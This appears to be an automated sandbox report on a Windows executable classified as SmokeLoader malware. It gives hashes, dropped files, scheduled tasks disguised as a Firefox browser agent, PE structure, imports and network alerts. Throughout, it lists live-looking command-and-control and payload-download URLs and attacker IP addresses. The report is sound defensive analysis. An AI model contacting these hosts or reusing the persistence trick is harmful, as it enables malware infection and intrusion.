                                      Overall analysis duration:0h 9m 14s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:10
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:1
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:file.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@7/4@22/3
                                      EGA Information:
                                      • Successful, ratio: 66.7%
                                      HCA Information:
                                      • Successful, ratio: 97%
                                      • Number of executed functions: 82
                                      • Number of non-executed functions: 18
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded IPs from analysis (whitelisted): 40.126.32.76, 20.190.160.14, 20.190.160.22, 40.126.32.134, 40.126.32.138, 40.126.32.72, 40.126.32.68, 40.126.32.136
                                      • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                      • Execution Graph export aborted for target fgbwcit, PID 5356 because there are no executed function
                                      • Execution Graph export aborted for target trbwcit, PID 1432 because there are no executed function
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                      • Report size getting too big, too many NtOpenKey calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      TimeTypeDescription
                                      16:28:15API Interceptor377037x Sleep call for process: explorer.exe modified
                                      21:28:32Task SchedulerRun new task: Firefox Default Browser Agent F8FEE74F6B84D0A6 path: C:\Users\user\AppData\Roaming\trbwcit
                                      21:29:28Task SchedulerRun new task: Firefox Default Browser Agent B72083AE88054687 path: C:\Users\user\AppData\Roaming\fgbwcit
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      190.147.128.172wu5C20dPdy.exeGet hashmaliciousSmokeLoaderBrowse
                                      • nwgrus.ru/tmp/index.php
                                      RWcyVDbMGQ.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 100xmargin.com/tmp/index.php
                                      C1APU2jz2B.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 100xmargin.com/tmp/index.php
                                      xvJv1BpknZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                      • dbfhns.in/tmp/index.php
                                      23.145.40.164mGFoU1INUk.exeGet hashmaliciousSmokeLoaderBrowse
                                        uSIvID4Y7U.exeGet hashmaliciousSmokeLoaderBrowse
                                          wBgwzVbZuV.exeGet hashmaliciousSmokeLoaderBrowse
                                            bQ7r31F9Ow.exeGet hashmaliciousSmokeLoaderBrowse
                                              LbzlI5idGJ.exeGet hashmaliciousSmokeLoaderBrowse
                                                PGUs9p74si.exeGet hashmaliciousSmokeLoaderBrowse
                                                  IpYWCeJMsb.exeGet hashmaliciousSmokeLoaderBrowse
                                                    Wd7eNVLo7b.exeGet hashmaliciousSmokeLoaderBrowse
                                                      T1TmLXusl0.exeGet hashmaliciousSmokeLoaderBrowse
                                                        O4zPA1oI9Y.exeGet hashmaliciousSmokeLoaderBrowse
                                                          175.119.10.231mGFoU1INUk.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • nwgrus.ru/tmp/index.php
                                                          mLn7GEEpuS.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                                                          • epohe.ru/tmp/
                                                          Ltoj8zXMGf.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                          • 100xmargin.com/tmp/index.php
                                                          kCiQWUqQtC.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                          • 100xmargin.com/tmp/index.php
                                                          setup.exeGet hashmaliciousBabuk, DjvuBrowse
                                                          • cajgtus.com/lancer/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=true
                                                          SWjcpYfYPy.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • gebeus.ru/tmp/index.php
                                                          file.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • gebeus.ru/tmp/index.php
                                                          file.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • gebeus.ru/tmp/index.php
                                                          n8XBpFdVFU.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                          • sdfjhuz.com/dl/build2.exe
                                                          SUwX12D2S6.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                          • sdfjhuz.com/dl/build2.exe
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          nwgrus.rumGFoU1INUk.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 119.204.11.2
                                                          uSIvID4Y7U.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 190.224.203.37
                                                          wBgwzVbZuV.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 116.58.10.60
                                                          bQ7r31F9Ow.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 190.147.2.86
                                                          LbzlI5idGJ.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 187.211.161.52
                                                          PGUs9p74si.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 92.36.226.66
                                                          IpYWCeJMsb.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 201.103.8.135
                                                          Wd7eNVLo7b.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 190.224.203.37
                                                          T1TmLXusl0.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 210.182.29.70
                                                          O4zPA1oI9Y.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 160.177.223.165
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          TelmexColombiaSACOna.elfGet hashmaliciousMiraiBrowse
                                                          • 190.143.63.156
                                                          7aodVUk6TV.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 186.86.212.65
                                                          79VAlgfTk8.elfGet hashmaliciousMiraiBrowse
                                                          • 181.56.182.151
                                                          bQ7r31F9Ow.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 190.147.2.86
                                                          na.elfGet hashmaliciousMiraiBrowse
                                                          • 190.143.63.127
                                                          PGUs9p74si.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 190.156.239.49
                                                          na.elfGet hashmaliciousMiraiBrowse
                                                          • 190.156.168.129
                                                          5zA3mXMdtG.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 181.52.122.51
                                                          XvAqhy3FO6.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 200.118.227.2
                                                          970Qh1XiFt.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 181.48.255.110
                                                          SKB-ASSKBroadbandCoLtdKRmGFoU1INUk.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 175.119.10.231
                                                          na.elfGet hashmaliciousMiraiBrowse
                                                          • 222.238.145.97
                                                          na.elfGet hashmaliciousUnknownBrowse
                                                          • 39.122.198.97
                                                          na.elfGet hashmaliciousMiraiBrowse
                                                          • 222.238.145.88
                                                          na.elfGet hashmaliciousMiraiBrowse
                                                          • 1.253.35.1
                                                          na.elfGet hashmaliciousMiraiBrowse
                                                          • 1.235.113.234
                                                          na.elfGet hashmaliciousMiraiBrowse
                                                          • 1.248.72.126
                                                          6DroQ0jTFY.elfGet hashmaliciousMiraiBrowse
                                                          • 58.122.30.38
                                                          cqdEWgq9fW.elfGet hashmaliciousMiraiBrowse
                                                          • 114.204.119.182
                                                          dNBHFhYkoO.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 58.232.149.105
                                                          SURFAIRWIRELESS-IN-01USmGFoU1INUk.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 23.145.40.164
                                                          uSIvID4Y7U.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 23.145.40.164
                                                          wBgwzVbZuV.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 23.145.40.164
                                                          bQ7r31F9Ow.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 23.145.40.164
                                                          LbzlI5idGJ.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 23.145.40.164
                                                          PGUs9p74si.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 23.145.40.164
                                                          IpYWCeJMsb.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 23.145.40.164
                                                          Wd7eNVLo7b.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 23.145.40.164
                                                          T1TmLXusl0.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 23.145.40.164
                                                          O4zPA1oI9Y.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 23.145.40.164
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          72a589da586844d7f0818ce684948eeamGFoU1INUk.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 23.145.40.164
                                                          uSIvID4Y7U.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 23.145.40.164
                                                          wBgwzVbZuV.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 23.145.40.164
                                                          bQ7r31F9Ow.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 23.145.40.164
                                                          LbzlI5idGJ.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 23.145.40.164
                                                          PGUs9p74si.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 23.145.40.164
                                                          IpYWCeJMsb.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 23.145.40.164
                                                          Wd7eNVLo7b.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 23.145.40.164
                                                          T1TmLXusl0.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 23.145.40.164
                                                          O4zPA1oI9Y.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 23.145.40.164
                                                          No context
                                                          Process:C:\Windows\explorer.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):242688
                                                          Entropy (8bit):5.8793046064049905
                                                          Encrypted:false
                                                          SSDEEP:3072:9TA7cae5AP1XfHJ2IQg4cq5FQ+CoNmp8FBxqXYUGrG:9TA7cjOP1vJ28+FwwqI
                                                          MD5:F42E9B6758241070E7815B8BD1EB8335
                                                          SHA1:E9C8CBE1D1BF1B47A913C0900EA86ADB1F553631
                                                          SHA-256:07C4DB8CD40625B3BA63A1DB74432EA62A8ADC5ABECDF32166BC25AB75AD79D5
                                                          SHA-512:35DD401427C3FE5C03A7B363545B93E4E5C09EF7EFA0D55F109A25460E21CBB04D5539A54C0BB001AF74D13936ECC3DF7FD7C7919B3906BA32BE830459941C0E
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Reputation:low
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y..*..*..*...*..*...*..*...*...*.F.*..*..*...*...*..*...*..*...*..*Rich..*........................PE..L...z..d.................N....r..............`....@...........................s......4......................................tw..<.....r..............................................................................`..|............................text...OL.......N.................. ..`.rdata..& ...`..."...R..............@..@.data...|.o..........t..............@....puneki..D....q..8..................@....fok.....(....q..(..................@....rsrc.........r.....................@..@................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\explorer.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:modified
                                                          Size (bytes):242688
                                                          Entropy (8bit):5.8793046064049905
                                                          Encrypted:false
                                                          SSDEEP:3072:9TA7cae5AP1XfHJ2IQg4cq5FQ+CoNmp8FBxqXYUGrG:9TA7cjOP1vJ28+FwwqI
                                                          MD5:F42E9B6758241070E7815B8BD1EB8335
                                                          SHA1:E9C8CBE1D1BF1B47A913C0900EA86ADB1F553631
                                                          SHA-256:07C4DB8CD40625B3BA63A1DB74432EA62A8ADC5ABECDF32166BC25AB75AD79D5
                                                          SHA-512:35DD401427C3FE5C03A7B363545B93E4E5C09EF7EFA0D55F109A25460E21CBB04D5539A54C0BB001AF74D13936ECC3DF7FD7C7919B3906BA32BE830459941C0E
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Reputation:low
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y..*..*..*...*..*...*..*...*...*.F.*..*..*...*...*..*...*..*...*..*Rich..*........................PE..L...z..d.................N....r..............`....@...........................s......4......................................tw..<.....r..............................................................................`..|............................text...OL.......N.................. ..`.rdata..& ...`..."...R..............@..@.data...|.o..........t..............@....puneki..D....q..8..................@....fok.....(....q..(..................@....rsrc.........r.....................@..@................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\explorer.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):243200
                                                          Entropy (8bit):5.896612954245981
                                                          Encrypted:false
                                                          SSDEEP:3072:tTA5IqRZn1qS6GF3Sv3zscq5SQ+CoNep0FBxqXYUGrG:tTAuqRZ7ndw3y+FBqI
                                                          MD5:F0342947877C844A5C82CB4BB5FDADAD
                                                          SHA1:C460F35ED9F2B3FD6172F38C70B6073FFFE70F17
                                                          SHA-256:E93BC7594D1FC8CA1EFF0E522B8547E74B3AC33840C55B4F50F69278E4CD8242
                                                          SHA-512:3B6657DE56FE6EBBE964512091638596D41962B1C7E531A81BC85003F4A194232C1083904E0817E6E6F969567517131FE12D11BA0065EA804362DE5EF709B2F7
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 37%
                                                          Reputation:low
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y..*..*..*...*..*...*..*...*...*.F.*..*..*...*...*..*...*..*...*..*Rich..*........................PE..L....,.e.................P....r..............`....@...........................s......w......................................tw..<.....r..............................................................................`..|............................text...oO.......P.................. ..`.rdata..& ...`..."...T..............@..@.data...|.o..........v..............@....vugud...D....q..8..................@....fay.....(....q..(..................@....rsrc.........r.....................@..@................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\explorer.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:true
                                                          Reputation:high, very likely benign file
                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):5.896612954245981
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:file.exe
                                                          File size:243'200 bytes
                                                          MD5:f0342947877c844a5c82cb4bb5fdadad
                                                          SHA1:c460f35ed9f2b3fd6172f38c70b6073fffe70f17
                                                          SHA256:e93bc7594d1fc8ca1eff0e522b8547e74b3ac33840c55b4f50f69278e4cd8242
                                                          SHA512:3b6657de56fe6ebbe964512091638596d41962b1c7e531a81bc85003f4a194232c1083904e0817e6e6f969567517131fe12d11ba0065ea804362de5ef709b2f7
                                                          SSDEEP:3072:tTA5IqRZn1qS6GF3Sv3zscq5SQ+CoNep0FBxqXYUGrG:tTAuqRZ7ndw3y+FBqI
                                                          TLSH:1E342A41EEF13C14F673DA31DE3992E8A62FF9E25E20625E11A45A0F08F1291C57B736
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y...*...*...*...*...*...*...*...*...*.F.*...*...*...*...*...*...*...*...*...*Rich...*........................PE..L....,.e...
                                                          Icon Hash:738733b18b8b8be4
                                                          Entrypoint:0x4018e4
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x657F2CA1 [Sun Dec 17 17:15:13 2023 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:0
                                                          File Version Major:5
                                                          File Version Minor:0
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:0
                                                          Import Hash:636068238a0ab0df9c8e341eee8428d0
                                                          Instruction
                                                          call 00007FAAD08C7390h
                                                          jmp 00007FAAD08C3C8Dh
                                                          mov edi, edi
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 00000328h
                                                          mov dword ptr [0041A3D0h], eax
                                                          mov dword ptr [0041A3CCh], ecx
                                                          mov dword ptr [0041A3C8h], edx
                                                          mov dword ptr [0041A3C4h], ebx
                                                          mov dword ptr [0041A3C0h], esi
                                                          mov dword ptr [0041A3BCh], edi
                                                          mov word ptr [0041A3E8h], ss
                                                          mov word ptr [0041A3DCh], cs
                                                          mov word ptr [0041A3B8h], ds
                                                          mov word ptr [0041A3B4h], es
                                                          mov word ptr [0041A3B0h], fs
                                                          mov word ptr [0041A3ACh], gs
                                                          pushfd
                                                          pop dword ptr [0041A3E0h]
                                                          mov eax, dword ptr [ebp+00h]
                                                          mov dword ptr [0041A3D4h], eax
                                                          mov eax, dword ptr [ebp+04h]
                                                          mov dword ptr [0041A3D8h], eax
                                                          lea eax, dword ptr [ebp+08h]
                                                          mov dword ptr [0041A3E4h], eax
                                                          mov eax, dword ptr [ebp-00000320h]
                                                          mov dword ptr [0041A320h], 00010001h
                                                          mov eax, dword ptr [0041A3D8h]
                                                          mov dword ptr [0041A2D4h], eax
                                                          mov dword ptr [0041A2C8h], C0000409h
                                                          mov dword ptr [0041A2CCh], 00000001h
                                                          mov eax, dword ptr [00419008h]
                                                          mov dword ptr [ebp-00000328h], eax
                                                          mov eax, dword ptr [0041900Ch]
                                                          mov dword ptr [ebp-00000324h], eax
                                                          call dword ptr [000000DCh]
                                                          Programming Language:
                                                          • [C++] VS2008 build 21022
                                                          • [ASM] VS2008 build 21022
                                                          • [ C ] VS2008 build 21022
                                                          • [IMP] VS2005 build 50727
                                                          • [RES] VS2008 build 21022
                                                          • [LNK] VS2008 build 21022
                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x177740x3c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x27210000x1cac0.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x160000x17c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x14f6f0x15000f8d0a9d4becd8846b657e5f44f1141fdFalse0.8229747953869048data7.548546960257042IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x160000x20260x22006da4b7c2534b0027fef7635e158ee334False0.36247702205882354data5.4153798035975225IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0x190000x26fff7c0x140050c0dd9d406b2697a593034cdc3cf287unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .vugud0x27190000x44000x3800b211778b80f6d441b6cf61ada776fc6dFalse0.0025809151785714285data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .fay0x271e0000x28000x28001276481102f218c981e0324180bafd9fFalse0.00322265625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x27210000x1cac00x1cc000267d5c30b13ca618b1ccdaa9189f178False0.4420091711956522data5.0953748346714445IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0x27219d00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5700959488272921
                                                          RT_ICON0x27228780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6371841155234657
                                                          RT_ICON0x27231200x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.6935483870967742
                                                          RT_ICON0x27237e80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7456647398843931
                                                          RT_ICON0x2723d500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5137966804979253
                                                          RT_ICON0x27262f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.6128048780487805
                                                          RT_ICON0x27273a00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.6180327868852459
                                                          RT_ICON0x2727d280x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.7570921985815603
                                                          RT_ICON0x27282080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.3368869936034115
                                                          RT_ICON0x27290b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5252707581227437
                                                          RT_ICON0x27299580x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.5858294930875576
                                                          RT_ICON0x272a0200x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6372832369942196
                                                          RT_ICON0x272a5880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.4263485477178423
                                                          RT_ICON0x272cb300x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.49959016393442623
                                                          RT_ICON0x272d4b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.5062056737588653
                                                          RT_ICON0x272d9880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.39498933901918976
                                                          RT_ICON0x272e8300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5546028880866426
                                                          RT_ICON0x272f0d80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6169354838709677
                                                          RT_ICON0x272f7a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6423410404624278
                                                          RT_ICON0x272fd080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.42706378986866794
                                                          RT_ICON0x2730db00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.4245901639344262
                                                          RT_ICON0x27317380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.4645390070921986
                                                          RT_ICON0x2731c080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.28331556503198296
                                                          RT_ICON0x2732ab00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.36913357400722024
                                                          RT_ICON0x27333580x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.37672811059907835
                                                          RT_ICON0x2733a200x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.3786127167630058
                                                          RT_ICON0x2733f880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.25778008298755184
                                                          RT_ICON0x27365300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.275328330206379
                                                          RT_ICON0x27375d80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.28647540983606556
                                                          RT_ICON0x2737f600x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.32358156028368795
                                                          RT_STRING0x27385f80xccdata0.553921568627451
                                                          RT_STRING0x27386c80x50cdata0.4473684210526316
                                                          RT_STRING0x2738bd80x3aadata0.4616204690831556
                                                          RT_STRING0x2738f880x52cdata0.4516616314199396
                                                          RT_STRING0x27394b80x652data0.4338689740420272
                                                          RT_STRING0x2739b100x798data0.41975308641975306
                                                          RT_STRING0x273a2a80x84cdata0.4129001883239171
                                                          RT_STRING0x273aaf80x666data0.4340659340659341
                                                          RT_STRING0x273b1600x7f6data0.4210009813542689
                                                          RT_STRING0x273b9580x758data0.41914893617021276
                                                          RT_STRING0x273c0b00x78cdata0.4254658385093168
                                                          RT_STRING0x273c8400x666data0.4340659340659341
                                                          RT_STRING0x273cea80x69edata0.4268004722550177
                                                          RT_STRING0x273d5480x54cdata0.44026548672566373
                                                          RT_STRING0x273da980x26data0.5526315789473685
                                                          RT_GROUP_ICON0x272d9200x68dataTurkishTurkey0.7019230769230769
                                                          RT_GROUP_ICON0x27383c80x76dataTurkishTurkey0.6779661016949152
                                                          RT_GROUP_ICON0x27281900x76dataTurkishTurkey0.6610169491525424
                                                          RT_GROUP_ICON0x2731ba00x68dataTurkishTurkey0.7211538461538461
                                                          RT_VERSION0x27384400x1b4data0.5848623853211009
                                                          DLLImport
                                                          KERNEL32.dllGetConsoleAliasExesLengthA, DeleteVolumeMountPointA, OpenJobObjectA, ReadConsoleA, InterlockedDecrement, GlobalSize, SetDefaultCommConfigW, InterlockedCompareExchange, GetComputerNameW, SetEvent, GetNumaAvailableMemoryNode, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesLengthA, SetCommState, GetConsoleWindow, ReadConsoleOutputW, GetVersionExW, GetStringTypeExW, HeapDestroy, GetFileAttributesA, GetTimeFormatW, SearchPathW, GetBinaryTypeA, DisconnectNamedPipe, LCMapStringA, GetLastError, GetProcAddress, MoveFileW, SetStdHandle, GetNumaHighestNodeNumber, LoadLibraryA, LocalAlloc, WritePrivateProfileStringA, QueryDosDeviceW, GetModuleFileNameA, BuildCommDCBA, FatalAppExitA, GetShortPathNameW, SetCalendarInfoA, FindAtomW, SetConsoleMode, PulseEvent, HeapAlloc, MultiByteToWideChar, Sleep, ExitProcess, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, WriteFile, GetStdHandle, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize
                                                          ADVAPI32.dllClearEventLogW
                                                          Language of compilation systemCountry where language is spokenMap
                                                          TurkishTurkey
                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2024-10-12T22:28:34.855747+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449738190.147.128.17280TCP
                                                          2024-10-12T22:28:36.179777+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449739190.147.128.17280TCP
